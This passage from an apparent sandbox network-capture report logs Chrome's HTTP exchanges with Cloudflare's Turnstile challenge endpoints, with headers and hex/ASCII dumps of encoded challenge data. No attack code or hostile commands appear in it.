                                                                                  2025-01-07 18:49:08 UTC16384OUTData Raw: 76 5f 38 66 65 36 32 30 32 36 33 38 35 35 35 65 37 38 3d 79 4e 32 4f 56 48 6b 38 53 48 53 44 32 44 39 6b 51 66 32 4f 78 53 77 38 78 41 78 31 78 70 4f 6b 50 44 42 78 34 34 4f 2d 70 4e 44 58 71 78 52 53 47 2d 4e 4f 78 75 32 71 78 50 4f 6c 53 48 6c 78 25 32 62 51 6a 78 6b 43 69 4a 5a 72 4f 30 78 6d 47 44 61 78 47 47 78 39 69 64 6c 6c 32 6b 66 72 4f 77 30 78 67 6a 42 6a 4f 61 78 76 56 72 38 78 6a 4f 44 30 4e 30 37 7a 78 44 39 4d 44 47 44 66 39 7a 50 5a 66 44 68 78 4b 58 78 78 4b 34 78 77 72 78 33 4f 78 57 78 6b 4d 58 78 2b 7a 45 54 51 31 75 36 6c 66 6f 53 31 66 31 39 47 78 42 34 6c 64 6b 32 69 77 58 45 78 44 2d 55 66 46 35 4c 73 56 58 78 78 4e 71 78 41 52 72 2d 4f 4f 32 45 61 52 7a 4d 77 30 66 31 47 48 41 7a 31 68 30 46 52 76 59 44 52 49 33 34 43 4e 5a 52 47
                                                                                  Data Ascii: v_8fe6202638555e78=yN2OVHk8SHSD2D9kQf2OxSw8xAx1xpOkPDBx44O-pNDXqxRSG-NOxu2qxPOlSHlx%2bQjxkCiJZrO0xmGDaxGGx9idll2kfrOw0xgjBjOaxvVr8xjOD0N07zxD9MDGDf9zPZfDhxKXxxK4xwrx3OxWxkMXx+zETQ1u6lfoS1f19GxB4ldk2iwXExD-UfF5LsVXxxNqxARr-OO2EaRzMw0f1GHAz1h0FRvYDRI34CNZRG
                                                                                  2025-01-07 18:49:08 UTC16384OUTData Raw: 61 6b 68 4f 4a 55 4f 4f 48 47 66 4b 48 69 78 78 4f 6e 4f 35 4f 79 4a 32 37 46 38 78 62 78 32 32 78 58 78 71 75 66 32 6b 24 78 59 4f 39 53 78 55 65 65 4f 79 53 48 74 4f 6d 67 39 72 44 71 78 5a 4f 79 72 6b 4b 78 32 78 77 78 78 53 53 5a 50 2b 32 44 49 4f 41 78 61 47 44 24 78 6b 4f 2d 78 78 2d 78 76 75 78 72 78 2d 78 2d 72 66 55 6b 36 47 78 4f 78 32 44 68 4f 2d 64 78 4f 48 33 78 6c 78 4d 30 48 2d 78 54 78 61 35 48 64 78 44 78 72 47 44 66 41 2d 64 79 4f 66 36 47 6f 4f 6b 55 78 69 78 2b 4f 2d 78 6b 36 47 73 78 72 47 64 64 6b 4b 78 31 71 78 6f 6b 6b 38 44 6a 42 64 78 6a 78 72 47 48 43 32 32 78 43 54 4e 2b 4f 52 62 6e 4f 48 48 78 7a 4f 2b 4f 78 62 24 68 4f 2b 6e 44 64 78 46 47 79 62 65 62 45 55 78 44 48 48 32 4f 45 56 32 78 64 48 78 42 4f 48 78 77 41 6e 39 4f 78
                                                                                  Data Ascii: akhOJUOOHGfKHixxOnO5OyJ27F8xbx22xXxquf2k$xYO9SxUeeOySHtOmg9rDqxZOyrkKx2xwxxSSZP+2DIOAxaGD$xkO-xx-xvuxrx-x-rfUk6GxOx2DhO-dxOH3xlxM0H-xTxa5HdxDxrGDfA-dyOf6GoOkUxix+O-xk6GsxrGddkKx1qxokk8DjBdxjxrGHC22xCTN+ORbnOHHxzO+Oxb$hO+nDdxFGybebEUxDHH2OEV2xdHxBOHxwAn9Ox
                                                                                  2025-01-07 18:49:08 UTC32OUTData Raw: 38 44 47 37 73 65 56 48 71 4c 36 66 6a 4d 55 2b 42 68 36 79 57 48 50 4f 4f 2d 65 64 66 78 78 78
                                                                                  Data Ascii: 8DG7seVHqL6fjMU+Bh6yWHPOO-edfxxx
                                                                                  2025-01-07 18:49:09 UTC318INHTTP/1.1 200 OK
                                                                                  Date: Tue, 07 Jan 2025 18:49:09 GMT
                                                                                  Content-Type: text/plain; charset=UTF-8
                                                                                  Content-Length: 26268
                                                                                  Connection: close
                                                                                  cf-chl-gen: /xxIbA/BkNu0bqcaft2Vttu54p1ZEbMJ6wAIQRCIFoJMK4X9wlSWduOwjBNu+q5QFUI=$L170WUAt/zD8j5f+
                                                                                  Server: cloudflare
                                                                                  CF-RAY: 8fe620462d35330c-EWR
                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                  2025-01-07 18:49:09 UTC1051INData Raw: 64 6c 71 49 52 6f 42 32 58 56 2b 42 59 32 56 6c 69 34 46 78 69 46 64 56 69 35 75 51 66 34 2b 66 6c 49 4e 67 6c 4a 2b 4f 64 58 61 5a 70 4b 6c 6f 68 71 36 4c 68 59 57 69 73 57 36 4c 67 6f 53 71 6c 59 56 37 70 5a 65 78 6a 49 32 66 65 70 69 58 6f 5a 4f 39 73 70 79 43 74 59 61 67 6d 4d 48 51 70 6f 79 74 6a 64 61 54 6c 4d 54 58 30 39 76 4d 6d 5a 44 67 79 39 69 68 76 36 79 66 75 75 69 6b 73 61 57 6f 75 4d 36 33 72 37 44 4b 30 4e 37 4d 30 65 6e 31 73 64 44 50 30 62 61 34 36 62 6e 62 76 50 44 57 30 77 62 47 33 74 6e 45 76 4e 33 6f 78 76 62 46 35 68 45 4e 2f 50 33 53 35 76 63 49 35 4d 77 56 46 73 2f 75 46 42 2f 77 37 39 34 50 34 65 45 42 49 75 6a 30 49 2f 76 2b 44 41 55 69 45 41 41 76 49 52 55 55 4a 7a 63 58 43 42 6b 55 42 7a 6b 6f 44 55 46 45 2b 78 38 2f 49 6a 68
                                                                                  Data Ascii: dlqIRoB2XV+BY2Vli4FxiFdVi5uQf4+flINglJ+OdXaZpKlohq6LhYWisW6LgoSqlYV7pZexjI2fepiXoZO9spyCtYagmMHQpoytjdaTlMTX09vMmZDgy9ihv6yfuuiksaWouM63r7DK0N7M0en1sdDP0ba46bnbvPDW0wbG3tnEvN3oxvbF5hEN/P3S5vcI5MwVFs/uFB/w794P4eEBIuj0I/v+DAUiEAAvIRUUJzcXCBkUBzkoDUFE+x8/Ijh
                                                                                  2025-01-07 18:49:09 UTC1369INData Raw: 62 6d 6c 53 68 58 6e 43 45 67 32 43 49 6e 6e 71 69 66 34 43 44 6e 6e 71 45 6a 61 4f 6c 63 34 65 54 6a 36 57 56 6c 62 6d 39 6a 34 75 54 73 4a 32 4e 76 70 48 48 76 5a 32 2f 77 5a 2b 65 68 59 71 2f 6e 62 4f 74 77 59 66 51 70 38 4b 6b 72 37 4f 7a 6c 74 71 76 6f 4d 6e 61 76 4e 33 62 30 4d 57 6e 79 72 6e 70 6f 2b 72 58 70 2b 2f 44 30 4e 48 6c 39 75 6e 7a 2b 63 54 7a 31 66 72 4a 78 73 76 36 79 66 6a 76 41 64 7a 2b 30 38 50 68 31 64 66 33 2b 64 62 35 79 67 67 4c 7a 51 2f 56 34 41 37 56 47 41 72 56 38 4e 58 6d 33 77 6e 63 46 4f 48 6a 48 53 44 2b 34 2b 58 69 35 68 67 6d 4c 41 6a 37 4b 67 34 6c 4b 68 55 6e 41 54 48 7a 2b 52 51 30 43 6a 66 32 43 67 41 51 44 6a 6f 32 2b 44 63 37 41 7a 74 4c 47 77 51 69 4a 42 46 4e 45 7a 38 2b 52 6c 46 51 45 31 67 37 55 6c 77 76 4a 30
                                                                                  Data Ascii: bmlShXnCEg2CInnqif4CDnnqEjaOlc4eTj6WVlbm9j4uTsJ2NvpHHvZ2/wZ+ehYq/nbOtwYfQp8Kkr7OzltqvoMnavN3b0MWnyrnpo+rXp+/D0NHl9unz+cTz1frJxsv6yfjvAdz+08Ph1df3+db5yggLzQ/V4A7VGArV8NXm3wncFOHjHSD+4+Xi5hgmLAj7Kg4lKhUnATHz+RQ0Cjf2CgAQDjo2+Dc7AztLGwQiJBFNEz8+RlFQE1g7UlwvJ0
                                                                                  2025-01-07 18:49:09 UTC1369INData Raw: 68 47 57 62 5a 36 6d 74 66 4b 4f 63 69 34 43 7a 69 4a 2b 55 68 58 53 50 6d 61 31 79 75 4a 46 77 75 62 32 41 6a 49 44 41 67 6f 4f 32 78 4a 36 36 77 4a 65 47 70 63 53 5a 77 5a 7a 4e 6b 73 32 51 79 71 69 57 79 70 53 75 74 4e 69 6e 6c 37 48 5a 72 72 76 43 76 62 69 77 77 4f 50 4c 79 62 6a 44 77 38 2b 6f 35 64 44 74 73 2f 58 6f 39 2b 6e 4b 38 39 76 5a 7a 72 76 56 38 73 33 79 37 66 7a 53 36 4c 2f 55 43 74 37 65 36 4f 37 4e 35 64 7a 52 37 2b 6b 41 41 77 72 79 79 2b 72 74 39 42 44 36 48 2f 63 6a 48 64 37 34 41 52 6e 6b 39 68 73 6f 2f 4f 67 63 49 79 45 4c 43 41 30 6c 2f 44 49 6b 38 75 6f 51 39 50 59 4d 39 44 39 42 46 78 54 2b 4f 42 6b 32 42 77 64 46 4f 54 77 46 42 55 73 69 49 79 73 78 49 30 6b 6d 4b 53 4e 48 4b 69 55 6b 54 68 30 6f 48 78 30 35 56 56 46 63 56 54 77
                                                                                  Data Ascii: hGWbZ6mtfKOci4CziJ+UhXSPma1yuJFwub2AjIDAgoO2xJ66wJeGpcSZwZzNks2QyqiWypSutNinl7HZrrvCvbiwwOPLybjDw8+o5dDts/Xo9+nK89vZzrvV8s3y7fzS6L/UCt7e6O7N5dzR7+kAAwryy+rt9BD6H/cjHd74ARnk9hso/OgcIyELCA0l/DIk8uoQ9PYM9D9BFxT+OBk2BwdFOTwFBUsiIysxI0kmKSNHKiUkTh0oHx05VVFcVTw
                                                                                  2025-01-07 18:49:09 UTC1369INData Raw: 61 4e 76 69 61 4b 74 72 6f 47 70 6b 6e 65 42 72 70 4b 32 6d 61 32 70 66 37 2b 36 71 72 32 55 66 59 43 78 74 4c 71 62 79 61 47 6b 6d 49 79 43 75 64 43 6b 74 64 4f 79 76 36 6a 59 79 4d 71 6f 7a 4c 2b 72 33 61 47 55 6f 4f 44 64 34 70 37 69 70 70 7a 70 34 36 76 6d 36 4d 72 73 35 2b 4c 4f 76 75 76 66 34 75 6e 33 7a 75 36 31 39 39 54 6f 39 4e 48 43 34 65 50 6a 78 73 44 38 2f 4d 50 30 41 51 76 4c 36 42 48 39 38 64 33 6f 7a 38 2f 6a 44 78 6a 55 48 76 33 70 43 41 6f 53 44 78 4d 6b 47 76 34 61 2b 53 72 63 4a 2f 76 6d 48 2f 76 77 4a 78 76 39 37 65 38 33 43 41 30 4b 49 78 59 50 48 6a 30 67 50 7a 45 6a 4e 45 41 31 52 7a 34 55 50 45 6c 49 4f 51 5a 48 54 43 41 51 53 78 35 54 4a 6a 45 55 51 30 51 75 52 46 46 47 57 44 31 54 54 6a 56 68 46 7a 35 65 4a 57 64 54 53 6b 74 57
                                                                                  Data Ascii: aNviaKtroGpkneBrpK2ma2pf7+6qr2UfYCxtLqbyaGkmIyCudCktdOyv6jYyMqozL+r3aGUoODd4p7ippzp46vm6Mrs5+LOvuvf4un3zu6199To9NHC4ePjxsD8/MP0AQvL6BH98d3oz8/jDxjUHv3pCAoSDxMkGv4a+SrcJ/vmH/vwJxv97e83CA0KIxYPHj0gPzEjNEA1Rz4UPElIOQZHTCAQSx5TJjEUQ0QuRFFGWD1TTjVhFz5eJWdTSktW
                                                                                  2025-01-07 18:49:09 UTC1369INData Raw: 56 79 73 34 57 33 74 70 64 31 74 36 2b 49 6e 36 39 33 6d 49 2b 30 76 4c 4b 58 75 35 71 44 6d 38 47 4a 79 72 6e 45 73 72 2b 66 6e 4a 58 58 30 72 6d 6d 30 4a 47 38 71 71 65 34 76 72 76 54 72 72 43 65 74 61 44 56 77 74 66 4a 78 73 53 35 78 75 69 77 32 38 47 30 31 4f 4b 77 30 4d 2f 59 73 65 6e 35 39 63 2b 32 30 39 6d 31 75 67 43 39 38 73 4c 39 33 74 4d 41 77 77 6e 75 42 41 6b 54 42 68 50 51 39 41 34 56 37 4e 4d 56 44 4e 6e 6f 44 52 72 64 31 50 45 65 48 52 38 68 47 65 62 67 38 78 30 41 43 51 63 71 45 77 45 42 4c 68 66 76 42 7a 62 32 4b 79 55 73 45 66 73 52 4f 44 67 37 41 6a 59 44 51 30 6b 37 42 30 74 45 52 41 77 2f 51 30 6f 50 49 55 42 52 4a 68 41 6c 56 78 59 70 47 56 46 57 53 43 70 61 57 42 55 38 58 30 35 6b 4d 6c 73 6e 59 44 64 6e 4c 44 6b 77 62 53 35 7a 5a
                                                                                  Data Ascii: Vys4W3tpd1t6+In693mI+0vLKXu5qDm8GJyrnEsr+fnJXX0rmm0JG8qqe4vrvTrrCetaDVwtfJxsS5xuiw28G01OKw0M/Ysen59c+209m1ugC98sL93tMAwwnuBAkTBhPQ9A4V7NMVDNnoDRrd1PEeHR8hGebg8x0ACQcqEwEBLhfvBzb2KyUsEfsRODg7AjYDQ0k7B0tERAw/Q0oPIUBRJhAlVxYpGVFWSCpaWBU8X05kMlsnYDdnLDkwbS5zZ
                                                                                  2025-01-07 18:49:09 UTC1369INData Raw: 70 64 5a 47 5a 72 6e 74 33 6f 61 39 38 68 4b 46 2f 67 37 54 44 74 4d 48 48 69 37 7a 42 6f 6f 2b 69 77 36 58 4b 73 64 6e 51 79 72 76 4c 72 63 61 78 30 64 69 74 75 64 62 50 31 74 4c 61 6d 38 6d 39 36 38 4b 6b 33 61 6e 5a 76 64 50 7a 79 38 58 6f 75 4f 53 34 32 76 76 55 33 65 36 35 2f 50 37 76 42 76 7a 51 33 2f 6a 65 33 4e 72 39 79 4f 6a 38 41 75 4c 51 34 77 72 32 37 51 73 5a 46 50 55 4a 31 2f 49 54 44 74 6e 31 2f 52 50 66 32 77 59 55 34 4f 67 47 34 2b 63 5a 4b 42 6b 6d 4c 4f 38 4d 4a 77 59 6a 42 4f 38 77 46 51 67 74 4e 67 6b 4d 4d 6a 6e 30 4e 45 55 58 41 43 4d 46 4e 45 51 59 42 77 41 61 4d 55 63 6e 52 43 41 51 51 69 34 51 45 31 56 49 4b 42 31 4b 4c 6b 67 61 48 69 41 30 56 45 34 78 4e 56 67 6d 58 45 4a 66 50 7a 6c 41 4b 47 68 66 51 47 5a 74 4b 57 56 76 64 47
                                                                                  Data Ascii: pdZGZrnt3oa98hKF/g7TDtMHHi7zBoo+iw6XKsdnQyrvLrcax0ditudbP1tLam8m968Kk3anZvdPzy8XouOS42vvU3e65/P7vBvzQ3/je3Nr9yOj8AuLQ4wr27QsZFPUJ1/ITDtn1/RPf2wYU4OgG4+cZKBkmLO8MJwYjBO8wFQgtNgkMMjn0NEUXACMFNEQYBwAaMUcnRCAQQi4QE1VIKB1KLkgaHiA0VE4xNVgmXEJfPzlAKGhfQGZtKWVvdG
                                                                                  2025-01-07 18:49:09 UTC1369INData Raw: 72 70 71 31 75 37 61 58 75 4a 6d 32 6d 62 79 49 75 72 2b 2f 6f 62 36 6b 78 4c 57 2b 6f 38 69 70 75 4b 37 4c 31 62 43 72 30 4e 66 65 73 39 57 67 34 72 66 58 33 38 69 38 34 75 50 49 77 4e 2f 52 32 73 58 6c 36 2f 4c 4f 35 38 6e 6d 36 2b 76 4e 75 38 76 76 39 2b 44 52 38 39 58 2b 31 76 66 47 33 4e 6a 37 33 51 76 6d 41 66 48 77 34 51 59 4d 2f 75 55 50 45 50 6a 6f 44 52 51 62 38 42 48 78 47 2f 51 56 42 68 4d 59 47 41 6f 6e 2b 68 33 39 46 77 41 68 37 4f 38 44 4a 52 34 4a 42 53 6b 4b 49 77 6f 73 48 6a 73 4d 4d 6a 67 72 46 6a 73 38 50 78 59 36 42 55 4d 66 50 53 34 37 4a 30 42 49 42 55 52 45 4a 6b 73 72 53 56 41 31 4b 55 77 2b 56 7a 4a 58 57 46 73 78 56 46 78 42 4e 46 6c 4b 58 7a 6c 64 5a 6b 46 44 59 47 68 6a 53 32 56 73 4e 45 68 6f 4e 57 74 73 62 55 35 37 56 33 42
                                                                                  Data Ascii: rpq1u7aXuJm2mbyIur+/ob6kxLW+o8ipuK7L1bCr0Nfes9Wg4rfX38i84uPIwN/R2sXl6/LO58nm6+vNu8vv9+DR89X+1vfG3Nj73QvmAfHw4QYM/uUPEPjoDRQb8BHxG/QVBhMYGAon+h39FwAh7O8DJR4JBSkKIwosHjsMMjgrFjs8PxY6BUMfPS47J0BIBUREJksrSVA1KUw+VzJXWFsxVFxBNFlKXzldZkFDYGhjS2VsNEhoNWtsbU57V3B


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  28192.168.2.649791104.18.94.414436872C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  2025-01-07 18:49:09 UTC599OUTGET /cdn-cgi/challenge-platform/h/g/flow/ov1/2126003918:1736274592:yhHrOMcq_yWVDdXkB-uSkPp0ozwhPwfQV3b4Q4T8_y4/8fe6202638555e78/b.m.fsd2Rbe6MMJrUqvVhKuNQiNdicvfSU7g3CyBe5Y-1736275743-1.1.1.1-UpjN468qQSLsm5ZjAEnXayNCiOtSagLrG.JkdhMYYDDWRSzdyKgyRB4Xb2RdeasX HTTP/1.1
                                                                                  Host: challenges.cloudflare.com
                                                                                  Connection: keep-alive
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                  Accept: */*
                                                                                  Sec-Fetch-Site: none
                                                                                  Sec-Fetch-Mode: cors
                                                                                  Sec-Fetch-Dest: empty
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  2025-01-07 18:49:09 UTC379INHTTP/1.1 404 Not Found
                                                                                  Date: Tue, 07 Jan 2025 18:49:09 GMT
                                                                                  Content-Type: application/json
                                                                                  Content-Length: 7
                                                                                  Connection: close
                                                                                  cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                  cf-chl-out: C6NOGMcrGt6nLMIIUZZ/nAEy/Sky2PLHEjY=$fkM1pqH/idjcAQrh
                                                                                  Server: cloudflare
                                                                                  CF-RAY: 8fe6204cfe125e6a-EWR
                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                  2025-01-07 18:49:09 UTC7INData Raw: 69 6e 76 61 6c 69 64
                                                                                  Data Ascii: invalid


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  29192.168.2.649854104.18.95.414436872C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  2025-01-07 18:49:18 UTC1172OUTPOST /cdn-cgi/challenge-platform/h/g/flow/ov1/2126003918:1736274592:yhHrOMcq_yWVDdXkB-uSkPp0ozwhPwfQV3b4Q4T8_y4/8fe6202638555e78/b.m.fsd2Rbe6MMJrUqvVhKuNQiNdicvfSU7g3CyBe5Y-1736275743-1.1.1.1-UpjN468qQSLsm5ZjAEnXayNCiOtSagLrG.JkdhMYYDDWRSzdyKgyRB4Xb2RdeasX HTTP/1.1
                                                                                  Host: challenges.cloudflare.com
                                                                                  Connection: keep-alive
                                                                                  Content-Length: 35147
                                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                  Content-type: application/x-www-form-urlencoded
                                                                                  CF-Chl-RetryAttempt: 0
                                                                                  sec-ch-ua-mobile: ?0
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                  CF-Challenge: b.m.fsd2Rbe6MMJrUqvVhKuNQiNdicvfSU7g3CyBe5Y-1736275743-1.1.1.1-UpjN468qQSLsm5ZjAEnXayNCiOtSagLrG.JkdhMYYDDWRSzdyKgyRB4Xb2RdeasX
                                                                                  sec-ch-ua-platform: "Windows"
                                                                                  Accept: */*
                                                                                  Origin: https://challenges.cloudflare.com
                                                                                  Sec-Fetch-Site: same-origin
                                                                                  Sec-Fetch-Mode: cors
                                                                                  Sec-Fetch-Dest: empty
                                                                                  Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv/3jv6g/0x4AAAAAAA4slXohRcRTneR7/auto/fbE/normal/auto/
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  2025-01-07 18:49:18 UTC16384OUTData Raw: 76 5f 38 66 65 36 32 30 32 36 33 38 35 35 35 65 37 38 3d 79 4e 32 4f 56 48 6b 38 53 48 53 44 32 44 39 6b 51 66 32 4f 78 53 77 38 78 41 78 31 78 70 4f 6b 50 44 42 78 34 34 4f 2d 70 4e 44 58 71 78 52 53 47 2d 4e 4f 78 75 32 71 78 50 4f 6c 53 48 6c 78 25 32 62 51 6a 78 6b 43 69 4a 5a 72 4f 30 78 6d 47 44 61 78 47 47 78 39 69 64 6c 6c 32 6b 66 72 4f 77 30 78 67 6a 42 6a 4f 61 78 76 56 72 38 78 6a 4f 44 30 4e 30 37 7a 78 44 39 4d 44 47 44 66 39 7a 50 5a 66 44 68 78 4b 58 78 78 4b 34 78 77 72 78 33 4f 78 57 78 6b 4d 58 78 2b 7a 45 54 51 31 75 36 6c 66 6f 53 31 66 31 39 47 78 42 34 6c 64 6b 32 69 77 58 45 78 44 2d 55 66 46 35 4c 73 56 58 78 78 4e 71 78 41 52 72 2d 4f 4f 32 45 61 52 7a 4d 77 30 66 31 47 48 41 7a 31 68 30 46 52 76 59 44 52 49 33 34 43 4e 5a 52 47
                                                                                  Data Ascii: v_8fe6202638555e78=yN2OVHk8SHSD2D9kQf2OxSw8xAx1xpOkPDBx44O-pNDXqxRSG-NOxu2qxPOlSHlx%2bQjxkCiJZrO0xmGDaxGGx9idll2kfrOw0xgjBjOaxvVr8xjOD0N07zxD9MDGDf9zPZfDhxKXxxK4xwrx3OxWxkMXx+zETQ1u6lfoS1f19GxB4ldk2iwXExD-UfF5LsVXxxNqxARr-OO2EaRzMw0f1GHAz1h0FRvYDRI34CNZRG
                                                                                  2025-01-07 18:49:18 UTC16384OUTData Raw: 61 6b 68 4f 4a 55 4f 4f 48 47 66 4b 48 69 78 78 4f 6e 4f 35 4f 79 4a 32 37 46 38 78 62 78 32 32 78 58 78 71 75 66 32 6b 24 78 59 4f 39 53 78 55 65 65 4f 79 53 48 74 4f 6d 67 39 72 44 71 78 5a 4f 79 72 6b 4b 78 32 78 77 78 78 53 53 5a 50 2b 32 44 49 4f 41 78 61 47 44 24 78 6b 4f 2d 78 78 2d 78 76 75 78 72 78 2d 78 2d 72 66 55 6b 36 47 78 4f 78 32 44 68 4f 2d 64 78 4f 48 33 78 6c 78 4d 30 48 2d 78 54 78 61 35 48 64 78 44 78 72 47 44 66 41 2d 64 79 4f 66 36 47 6f 4f 6b 55 78 69 78 2b 4f 2d 78 6b 36 47 73 78 72 47 64 64 6b 4b 78 31 71 78 6f 6b 6b 38 44 6a 42 64 78 6a 78 72 47 48 43 32 32 78 43 54 4e 2b 4f 52 62 6e 4f 48 48 78 7a 4f 2b 4f 78 62 24 68 4f 2b 6e 44 64 78 46 47 79 62 65 62 45 55 78 44 48 48 32 4f 45 56 32 78 64 48 78 42 4f 48 78 77 41 6e 39 4f 78
                                                                                  Data Ascii: akhOJUOOHGfKHixxOnO5OyJ27F8xbx22xXxquf2k$xYO9SxUeeOySHtOmg9rDqxZOyrkKx2xwxxSSZP+2DIOAxaGD$xkO-xx-xvuxrx-x-rfUk6GxOx2DhO-dxOH3xlxM0H-xTxa5HdxDxrGDfA-dyOf6GoOkUxix+O-xk6GsxrGddkKx1qxokk8DjBdxjxrGHC22xCTN+ORbnOHHxzO+Oxb$hO+nDdxFGybebEUxDHH2OEV2xdHxBOHxwAn9Ox
                                                                                  2025-01-07 18:49:18 UTC2379OUTData Raw: 37 66 72 57 2b 47 4f 44 2b 75 47 4f 66 75 73 6b 78 6f 6d 41 46 74 47 7a 4e 75 37 71 78 4c 78 39 6c 36 6d 71 65 5a 46 70 76 62 4b 58 2b 70 32 4d 4f 75 73 77 36 50 37 53 78 64 2b 44 78 69 32 44 66 7a 39 78 64 39 39 2b 34 75 4f 78 35 64 2d 78 35 35 64 76 4f 2d 78 65 4a 46 74 6b 4e 53 34 6f 56 48 78 51 31 4f 52 77 4e 78 34 78 54 54 6a 50 48 48 73 31 68 6d 59 43 52 6d 58 6c 42 38 44 6a 78 56 2d 75 64 6b 66 72 79 50 44 48 44 66 7a 6f 4f 77 47 44 45 52 74 37 4d 72 59 6b 78 6c 6e 61 4a 49 38 78 39 32 44 38 78 49 78 30 39 4c 78 44 43 4d 7a 70 6b 6a 6b 7a 24 67 78 2b 70 54 4d 79 2b 4f 61 41 77 42 78 2b 48 4d 39 6b 6f 78 68 36 7a 47 5a 50 56 51 4f 6c 4f 44 2d 31 45 44 55 41 44 34 4b 57 55 65 69 48 39 4f 65 38 4c 50 6b 46 4d 2d 64 2b 4f 78 32 78 4b 2d 5a 34 4b 52 4f
                                                                                  Data Ascii: 7frW+GOD+uGOfuskxomAFtGzNu7qxLx9l6mqeZFpvbKX+p2MOusw6P7Sxd+Dxi2Dfz9xd99+4uOx5d-x55dvO-xeJFtkNS4oVHxQ1ORwNx4xTTjPHHs1hmYCRmXlB8DjxV-udkfryPDHDfzoOwGDERt7MrYkxlnaJI8x92D8xIx09LxDCMzpkjkz$gx+pTMy+OaAwBx+HM9koxh6zGZPVQOlOD-1EDUAD4KWUeiH9Oe8LPkFM-d+Ox2xK-Z4KRO
                                                                                  2025-01-07 18:49:19 UTC274INHTTP/1.1 200 OK
                                                                                  Date: Tue, 07 Jan 2025 18:49:19 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Content-Length: 4624
                                                                                  Connection: close
                                                                                  cf-chl-out: bAXgmQWAAxEWzTk6Qt7eyZZyhp+nubx5qbNoIUED1R5c/k4ouAhnA4/tbHAdpijoNY1UfSm23Nlh0OqaNSLJ5e+x6uo+/mINx4/m0cpCjQ==$5wjtIAiedNete1KB
                                                                                  2025-01-07 18:49:19 UTC1203INData Raw: 63 66 2d 63 68 6c 2d 6f 75 74 2d 73 3a 20 62 72 6f 6e 4a 62 6b 78 73 45 4b 33 67 6d 39 72 71 51 4c 75 4c 6a 49 5a 6b 52 6e 77 71 42 6d 63 43 6e 56 55 38 71 6e 41 6e 2b 68 6f 6e 66 41 47 72 55 2b 6f 44 46 2b 66 79 5a 6c 36 33 6e 66 46 6e 35 65 46 54 58 59 73 66 71 6a 66 50 45 51 44 43 70 4f 51 2f 62 51 42 68 4c 51 77 74 6d 4b 52 59 45 4e 2b 58 78 59 37 45 74 49 61 4d 77 6d 62 31 49 68 59 37 6f 48 2b 46 2f 36 32 49 53 71 34 41 69 49 32 59 6a 6d 63 4c 63 62 65 49 2b 53 35 4c 34 52 76 4f 58 68 36 51 4f 38 78 43 5a 52 48 48 53 61 41 46 5a 58 55 4f 36 66 6e 63 76 62 63 4d 6a 72 43 34 54 54 65 6e 50 78 6a 32 48 67 53 36 79 32 48 39 6a 6e 51 51 69 4a 6f 49 4b 68 66 47 7a 70 58 2f 77 76 4d 33 53 71 59 4c 36 35 71 34 56 44 6f 58 45 42 79 58 56 67 4d 78 65 38 63 64
                                                                                  Data Ascii: cf-chl-out-s: bronJbkxsEK3gm9rqQLuLjIZkRnwqBmcCnVU8qnAn+honfAGrU+oDF+fyZl63nfFn5eFTXYsfqjfPEQDCpOQ/bQBhLQwtmKRYEN+XxY7EtIaMwmb1IhY7oH+F/62ISq4AiI2YjmcLcbeI+S5L4RvOXh6QO8xCZRHHSaAFZXUO6fncvbcMjrC4TTenPxj2HgS6y2H9jnQQiJoIKhfGzpX/wvM3SqYL65q4VDoXEByXVgMxe8cd
                                                                                  2025-01-07 18:49:19 UTC1261INData Raw: 64 6c 71 49 52 6f 42 32 58 56 2b 42 59 32 56 6c 69 34 46 78 69 46 64 56 56 47 71 51 57 58 6d 4a 6c 33 4b 63 65 48 75 43 6b 5a 78 32 6d 36 46 6a 65 36 4a 76 6f 6f 31 39 63 35 53 6a 6b 70 53 49 70 35 61 59 6b 70 6d 30 6a 4a 6d 65 74 62 6d 75 6d 48 36 79 6b 36 47 6b 74 63 79 68 71 61 53 61 6d 74 4f 6b 69 39 44 51 69 64 54 52 31 4b 6d 63 32 5a 32 71 32 70 76 4b 30 4c 48 6d 30 64 7a 44 36 72 2b 6c 33 64 79 38 78 39 33 64 30 64 44 74 34 65 6e 75 39 65 4f 7a 39 76 76 70 75 50 57 2f 75 4d 44 77 38 72 38 42 2f 50 50 45 42 77 6e 6e 78 2f 6e 4a 35 38 6a 39 36 66 44 4f 2f 73 33 74 30 77 62 5a 2b 42 33 64 47 4f 77 53 37 77 2f 66 42 68 50 37 32 68 59 4b 42 4f 4d 47 44 69 59 4f 43 77 49 6f 4e 42 51 4c 38 69 4d 75 2b 42 59 6f 43 52 55 65 45 50 30 2f 46 2f 77 41 4d 69 4a
                                                                                  Data Ascii: dlqIRoB2XV+BY2Vli4FxiFdVVGqQWXmJl3KceHuCkZx2m6Fje6Jvoo19c5SjkpSIp5aYkpm0jJmetbmumH6yk6GktcyhqaSamtOki9DQidTR1Kmc2Z2q2pvK0LHm0dzD6r+l3dy8x93d0dDt4enu9eOz9vvpuPW/uMDw8r8B/PPEBwnnx/nJ58j96fDO/s3t0wbZ+B3dGOwS7w/fBhP72hYKBOMGDiYOCwIoNBQL8iMu+BYoCRUeEP0/F/wAMiJ
